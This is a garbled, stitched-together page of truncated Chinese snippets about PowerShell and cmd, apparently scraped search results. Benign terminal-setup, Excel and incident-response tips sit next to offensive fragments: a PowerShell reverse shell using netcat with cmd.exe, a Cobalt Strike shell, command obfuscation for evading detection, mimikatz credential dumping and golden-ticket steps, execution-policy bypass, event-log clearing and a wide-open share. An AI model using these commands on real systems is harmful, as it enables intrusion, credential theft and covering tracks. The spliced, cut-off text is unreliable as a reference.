Powershell/cmd搜索所有c$隐藏共享的内容:
在Windows操作系统中,C$是一个隐藏的共享文件夹,它允许管理员通过网络访问计算机的C盘。要搜索所有C$隐藏共享的内容,可以使用以下步骤:
请注意,执行这些命令需要具有适当的权限。确保以管理员身份运行Powershell或命令提示符窗口。
关于Powershell和cmd的更多信息,您可以参考以下链接:
请注意,以上答案仅供参考,具体的实施步骤可能因环境和配置而有所不同。
找出所有分区根目录的*.dll文件,给出cmd或powershell命令【powershell】仅查找分区根目录中的 *.dll 文件,powershell命令是Get-PSDrive -PSProvider...FileSystem | ForEach-Object { Get-ChildItem -Path $_.Root -Filter "*.dll" -ErrorAction SilentlyContinue }【cmd...】仅查找分区根目录中而非子目录的 *.dll 文件,给出cmd命令dir /a-d /b C:\*.dllfor循环从A到Z,替换C:\盘符for %i in (A B C D E F G H I J...K L M N O P Q R S T U V W X Y Z) do dir /a-d /b %i:\*.dll 2>nul如果在.bat中,%需要2个,即for %%i in (A B C D E
功能需求 获取上传的 EXCEL 文件的所有文本信息并存储到数据库里,可以进一步实现对文件内容资料关键字查询的全文检索。...3、获取文本文件的内容字符串并存储到数据库中。...操作系统上安装 Office Excel 2016 数据库:Microsoft SQL Server 2016 .net版本: .netFramework4.7.1 或以上 开发工具:VS2019 C#...关键代码 组件库引入 获取Excel文件的文本内容 getExcelContent 方法返回 string 类型内容,即表示EXCEL 文件的文本内容,说明如下表: 序号 参数名 类型 说明 1 _filename...总结 以上代码我们提供了一些操作 EXCEL 的API关键方法,后续我们可以将文本内容存储到数据库中,查询或下载,可以参考我的文章: 《C# 将 Word 转文本存储到数据库并进行管理》 关于 EXCEL
0x01简介 本文将要介绍以下内容: 1.两种PowerShell的命令的历史记录 2.导出PowerShell的命令历史记录的方法 3.防御建议 0x02两种Powershell命令的历史记录 记录PowerShell...view=powershell-3.0 默认Powershell v2及以上支持能够记录当前会话中输入的命令,多个PowerShell的进程之间不共享,Powershell的进程退出后自动清除所有记录。.../Homework-of-C-Language/blob/master/SendKeyboardMessageToPowershell.cpp 代码实现了搜索指定PID的进程,向进程发送键盘消息,内容为.../blob/master/SendKeyboardMessageToPowershell(Get-History).cpp.cpp) 代码实现了搜索指定PID的进程,向进程发送键盘消息,内容为:Get-History...\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall{57E5A8BB-41EB-4F09-B332-B535C5954A28} 只需要删除这个注册表项及子项即可实现在已安装程序列表中隐藏
,以及怎么设置主题;以我本机为例,可以在上图看到 所有主题文件的路径: C:\Users\aifuxi\AppData\Local\Programs\oh-my-posh\themes 设置主题的命令...它提供: 语法着色简单语法错误通知良好的多线体验(编辑和历史)可定制的键绑定Cmd 和 emacs 模式(都没有完全实现,但都可以使用)许多配置选项Bash 样式完成(在 Cmd 模式下可选,在 Emacs...模式下默认)Bash/zsh 风格的交互式历史搜索 (CTRL-R)Emacs yank/kill ring基于 PowerShell 令牌的“单词”移动和杀死撤销重做自动保存历史记录,包括跨实时会话共享历史记录通过...隐藏烦人的copyright每次打开Windows Terminal都会出现烦人的copyright Windows PowerShell 版权所有(C) Microsoft Corporation。...保留所有权利。 安装最新的 PowerShell,了解新功能和改进!
\ 查看C盘下的文件 dir c:\ /A 查看C盘下的所有文件,包括隐藏文件...iwr iwr是PowerShell下的一款工具,所以我们如果在cmd下执行该命令的话,需要在前面加powershell命令,但是这会被安全软件检测到。...更多的关于PowerShell的用法:PowerShell使用浅析 本地加载并执行PowerShell脚本 在cmd当前目录下有PowerView.ps1脚本,并执行其中的Get-Netdomain模块...520 杀死PID为520的进程 Windows反弹Shell cmd窗口下利用Powershell反弹NC shell 亲测所有机器都适用 powershell IEX (New-Object...-p 8888 -e cmd.exe" cmd窗口下利用Powershell反弹CobaltStrike shell windows10 经常性不能用。
(3)查看服务器是否存在隐藏账号、克隆账号。 检查隐藏账号方法: CMD命令行使用”net user”,看不到”test$”这个账号,但在控制面板和本地用户和组是可以显示此用户的。...可以通过观察以下内容: 没有签名验证信息的进程 没有描述信息的进程 进程的属主 进程的路径是否合法 CPU或内存资源占用长时间过高的进程 (2)如何找到进程对应的程序位置...b、单击【开始】>【运行】;输入 cmd,然后输入at,检查计算机与网络上的其它计算机之间的会话或计划任务,如有,则确认是否为正常连接。 ?...检查方法: a、利用 Registry Workshop 注册表编辑器的搜索功能,可以找到最后写入时间区间的文件。 b、利用计算机自带文件搜索功能,指定修改时间进行搜索。...(2)历史命令记录 高版本Powershell会记录PowerShell的命令,所有的PowerShell命令将会保存在固定位置: %appdata%\Microsoft\Windows\PowerShell
,阿鑫就在这里简单总结一下我自己的一些方法吧,但是会的方法有比较少,后面在补充几个cmd/powershell平时常用的命令 技巧 (1)特殊符号/大小写 我们的"双引号,^尖角号,括号,逗号,分号,只能绕过一些常规的...,"双引号,^尖角号,括号,逗号,分号组合在一起,也是可以达到同样的效果的,cmd /c “ set a1=ser&& set a2=ne&& set a3=t u&&call echo %a2%%a3%...SET COMMAND whoami //加密你想执行的命令 关于cmd/powershell平时会用到的一些命令 (1)主机信息 qwinsta...cmd /c "choice /t 7 /d y /n >nul" & for /l %b in (1,1,255) do start cmd /c "ping 172.29....//关于echo >>追加下一个字符串自动换行,绕过/n的限制 net share everyone=C:\Windows /grant:everyone,full //开启共享 echo
1、介绍 PowerShell 可以简单的理解为 cmd 的高级版,cmd 能做的事在 PowerShell 中都能做,但 PowerShell 还能做很多 cmd 不能做的事情。...PowerShell 内置在 Windows 7、Windows Server 2008 R2 及更高版本的 Windows 系统中,同时 PowerShell 是构建在 .NET 平台上的,所有命令传递的都是...PowerShell 开发的 很多安全软件检测不到 PowerShell 的活动 cmd 通常会被阻止运行,但是 PowerShell 不会 可以用来管理活动目录 可输入 Get-Host 或者 $PSVersionTable...-WindowStyle Hidden (-W Hidden):隐藏窗口 -NoProfile (-NoP):不加载当前用户的配置文件 –Enc:执行 base64 编码后的 powershell 脚本字符串...PowerShell 还兼容 cmd 和 Linux 命令,如查看目录可以使用 dir 或者 ls 。
:1 隐藏B盘对应十进制数字:2 隐藏C盘对应十进制数字:4 隐藏D盘对应十进制数字:8 隐藏E盘对应十进制数字:16 隐藏F盘对应十进制数字:32 隐藏G盘对应十进制数字:64 隐藏H盘对应十进制数字...隐藏Z盘对应十进制数字:33554432 隐藏所有盘符对应十进制数字:67108863 2.win10系统下切换管理员cmd 由于win10处于安全考虑,会默认把administrator的账户禁用并隐藏...WeiyiGeek.切换管理员 ---- 0x01 win10系统进阶使用 1.Windows WSL 1.1)Linux子系统的安装使用 在microsoft store商店搜索Ubuntu并下载安装设置...WeiyiGeek.ubuntu 第一次登陆修改root密码以及默认的登陆用户: #初次登陆的时候 sudo su - root passwd root #新版本(就版本用lxrun) PS C:\...特性: 多标签支持:融合了CMD和PowerShell两个模块Ctrl+Shift+1=新建Windows PowerShell窗口 Ctrl+Shift+2=新建CMD窗口 Alt+1、2、3=切换对应命令行窗口
Cmder界面展示 启动Cmder界面如下,当然我设置了背景色,透明度,字体样式,隐藏标签栏栏,增加底部的状态栏,以及分屏功能。 Cmder界面展示 三、关于cmder的一些配置 1....界面效果的设置 首先使用windows+alt+p进入界面设置 背景色设置 字体设置 背景透明度 隐藏标签栏 显示底部状态栏 将Cmder默认的命令提示符"λ"改为“$”, 在cmder...+Tab 切换页签 Alt+F4 关闭所有页签 Alt+Shift+1 开启cmd.exe Alt+Shift+2 开启powershell.exe Alt+Shift+3 开启powershell.exe...Tab 自动路径补全 Ctrl+T 建立新页签 Ctrl+W 关闭页签 Ctrl+Tab 切换页签 Alt+F4 关闭所有页签 Alt+Shift+...1 开启cmd.exe Alt+Shift+2 开启powershell.exe Alt+Shift+3 开启powershell.exe (系统管理员权限) Ctrl+1 快速切换到第1个页签
:1 隐藏B盘对应十进制数字:2 隐藏C盘对应十进制数字:4 隐藏D盘对应十进制数字:8 隐藏E盘对应十进制数字:16 隐藏F盘对应十进制数字:32 隐藏G盘对应十进制数字:64 隐藏H盘对应十进制数字...隐藏Z盘对应十进制数字:33554432 隐藏所有盘符对应十进制数字:67108863 2.win10系统下切换管理员cmd 由于win10处于安全考虑,会默认把administrator的账户禁用并隐藏...cmd/k" #不显示头 WeiyiGeek.切换管理员 ---- 0x02 win10系统进阶使用 1.Windows WSL 1.1)Linux子系统的安装使用 在商店搜索Ubuntu并下载安装设置...WeiyiGeek.ubuntu 第一次登陆修改root密码以及默认的登陆用户: #初次登陆的时候 sudo su - root passwd root #新版本(就版本用lxrun) PS C:\...特性: 多标签支持:融合了CMD和PowerShell两个模块 Ctrl+Shift+1=新建Windows PowerShell窗口 Ctrl+Shift+2=新建CMD窗口 Alt+1、2、3=切换对应命令行窗口
(IoC)列表: –WindowStyle hidden / -w hidden: 隐藏程序的窗口 –Exec Bypass: 绕过类似Restricted之类的程序执行策略 –Command / -c...因此,在这种场景下,PowerShell.exe的父进程将会是cmd.exe: 所以说,我们可以通过观察PowerShell父进程和子进程之间的关系来作为我们的IoC。...除此之外,如果cmd.exe是通过脚本来生成的,并且父进程是 winword.exe、mshta.exe、wscript.exe或wuapp.exe的话,那么脚本的内容就值得我们去仔细检查了。...winword.exe),并且cmd.exe是由winword.exe生成的(winword.exe为PowerShell的祖父进程)。...一般来说,事件ID 4688的内容如下所示: 所以,我们需要使用下列搜索语句来搜索这些事件信息: 接下来,我们需要检查PowerShell进程初始化时传递过来的命令行参数。
该活动使用 SEO 投毒和恶意广告推高这些“带毒”的共享软件网站在 Google 搜索结果中的排名,据发现此事件的Zscaler 称,这些盗版软件包括了3DMark、Adobe Acrobat Pro等时下热门应用...由于采用字节填充技术,ZIP解压后的文件大小有600M,这是许多恶意软件遵循的常见反分析做法,其中包含的可执行文件是一个恶意软件加载程序,它会生成一个编码的 PowerShell 命令,该命令会在 10...cmd.exe 进程会下载一个 JPG 文件,该文件实际上是一个 DLL 文件,其内容反向排列。...今年6月,FreeBuf也曾报道过类似事件,信息窃取恶意软件隐藏在知名清理程序CCleaner中进行传播。...为了避免上述情况发生,用户应避免下载盗版软件、产品激活程序、破解程序、序列密钥生成器以及任何承诺无需付费即可使用付费软件的内容。即使包含这些虚假或恶意内容的网站在搜索结果中的排名很高。
将复制的主题代码粘贴到在list中,分别配置PowerShell的主题和cmd的主题,添加刚才获得代码即可应用对应的主题。name为标识,用于设置终端应用哪个主题。..."guid": "{97838c1f-307b-477a-b7fe-c9965c347e0b}", /*网页搜索guid生成可以获得每个程序唯一的guid,visual...studio内的工具也有生成guid的功能*/ "name": "CMD", "commandline": "cmd.exe",...,这样打开Windows Terminal默认启动的就是cmd终端了。...DWORD 639bc8(十六进制) #在菜单中显示或隐藏Windows Terminal选项 在Windows Terminal上右键新建项command 修改默认值为: C:\Users
将其上网行为的25号日志导出,筛选目标IP113.xx.xx.xx该新闻中心的C段共有大量的SMB发包记录指向该C段,源头均为内网10.15.4.18的机器,该机器正不断的向目标的445端口大量发包。...通过cmd命令ntstat显示网络状态以及端口发现该机器曾经向113.12.xx.xx段的445端口进行过大量的发包,确定该机器已沦为黑客的肉鸡。...0x06 后门分析 将后门程序svchost.exe上次至微步云沙箱进行行为分析,恶意程序先是释放了ps1文件后将自身C:\Windows\temp\svchost.exe添加至计划任务,后通过powershell...执行ps1文件读取到密码写出mkatz.ini,再通过CMD将powershell经过base64加密后的执行命令添加至计划任务7点执行一次进行权限维持。...通过恶意程序执行的powershell命令进行base64解密得到远程回传URL地址为v.beahh.com,在通过威胁情报搜索该URL显示该地址为驱动人生后门的回传服务器。
查看用户 cmd中输入 net user 此时,会显示出相关的系统账号: 此命令无法看到隐藏账号的情况,例如 admin$ 2....查找隐藏账户 1) lusrmgr.msc 查看隐藏用户 lusrmgr.msc 为打开本地用户和组 win + r / cmd 中输入 lusrmgr.msc lusrmgr能够看到常规的隐藏账户情况...查找隐藏账户 直接打开 powershell 窗口或在 cmd 窗口中输入 powershell 进入 powershell 命令行 Get-WmiObject -Class Win32_UserAccount...,尤其是可以查询进程命令内容,这对于常规挖矿等进程,可以直接看到进程中的远程矿池地址 cmd/powershell中输入: # 列出进程列表,与tasklist命令相通 wmic process list...# 获取命令帮助 doskey /history # 获取当前cmd窗的命令历史 未关闭的cmd窗口中键入F7: 2) powershell 历史 powershell 有两种历史记录的方式 内置会话记录
以下命令部分可以在Windows powershell 执行(如果你觉得开虚拟机太麻烦)powershell 可以执行复杂的cmd命令和部分Linux命令(还是推荐在Linux系统终端练习)用户信息查询...,如uid、gid和组文件命令 ls -al 列出文件-包括常规文件和隐藏文件以及它们的权限 tree 以树形结构列出文件,常用参数有:-d查看目录,-L num查看num层文件,-a查看隐藏文件 pwd...打印文件中的字节、单词和行数进程 ps 显示当前活动的进程 ps aux | grep 'telnet'搜索进程'telnet'的id pmap 显示进程的内存映射 top 显示所有正在运行的进程 kill...其他可以访问服务器的人) chmod 755 /data/test.c 将rwx设置为所有者,将r_x设置为组和所有人 chmod 766 /data/test.c 为所有者设置rwx,为组和每个人设置...Ctrl+U 清空当前键入的命令 Ctrl+W 删除光标前的单词 Ctrl+Y 粘贴 Ctrl + W 或 Ctrl + K 删除的内容 Ctrl+D 删除当前光标所在字符 (在没有字符时会关闭终端
任务1 介绍 任务2 带 Powerview 的枚举 首先我们要在绕过执行策略的情况下启动 PowerShell,以便我们可以运行脚本 powershell -ep bypass 接着我们可以启动...问题1:默认没有设置的共享文件夹是什么?...获取loot # 在绕过执行策略的情况下从cmd启动PowerShell powershell -ep bypass # 运行Sharphound PowerShell脚本 . ....回答:c39f2beb3d2ec06a62cb887fb391dee0 任务5 带有 mimikatz 的金票攻击 cd Downloads && mimikatz.exe privilege::debug...,对所有机器都具有提升的权限 misc::cmd 任务6 带服务器管理器的枚举 连接远程桌面 rdesktop -u Administrator -d CONTROLLER 10.10.135.137
: wevtutil qe /f:text "windows powershell" 查找指定数量的日志内容: wevtutil qe /f:text "windows powershell" /c:...20 删除单个evtx日志类别的所有信息: wevtutil cl "windows powershell" 参考: 《渗透技巧-Windows日志的删除与绕过》 单条evtx日志清除: 《渗透技巧...+ 参考: 《导出当前域内所有用户hash的技术整理》 《利用Powershell快速导出域控所有用户Hash》 方法3: mimikatz: mimikatz.exe "lsadump::dcsync...,用户正常情况下无法读取(使用Win32 API),但系统能够执行(使用Native API) 参考: 《渗透技巧——"隐藏"注册表的创建》 《渗透技巧——"隐藏"注册表的更多测试》 方法19:powershell...---- Tips 66 通过powershell读取注册表获得所有用户的远程桌面连接历史记录 默认读注册表只能获取当前已登录用户的注册表信息,可通过reg load加载配置单元获得未登录用户的注册表配置
(3) 简单总结PowerShell优点 PowerShell需要.NET环境的支持,同时支持.NET对象,其可读性、易用性,可以位居当前所有Shell之首。...Unrestricted:允许所有的Script运行 我们还可以使用下面的cmdlet命令设置PowerShell的执行策略。...举个例子来看管道是如何工作的,假设停止所有目前运行汇总以 “p” 字符开头命名的程序,命令如下: get-process p* | stop-process 管道并不是什么新事物,以前的Cmd控制台也有重定向的命令...4.PowerShell远程下载文件并执行 该部分内容学习了谢公子老师的总结,当然第二部分我详细介绍了和渗透结合的用法。...CMD窗口下载文件 管理员权限才可以下载到C盘目录下,普通权限不能下载到C盘。
领取专属 10元无门槛券
手把手带您无忧上云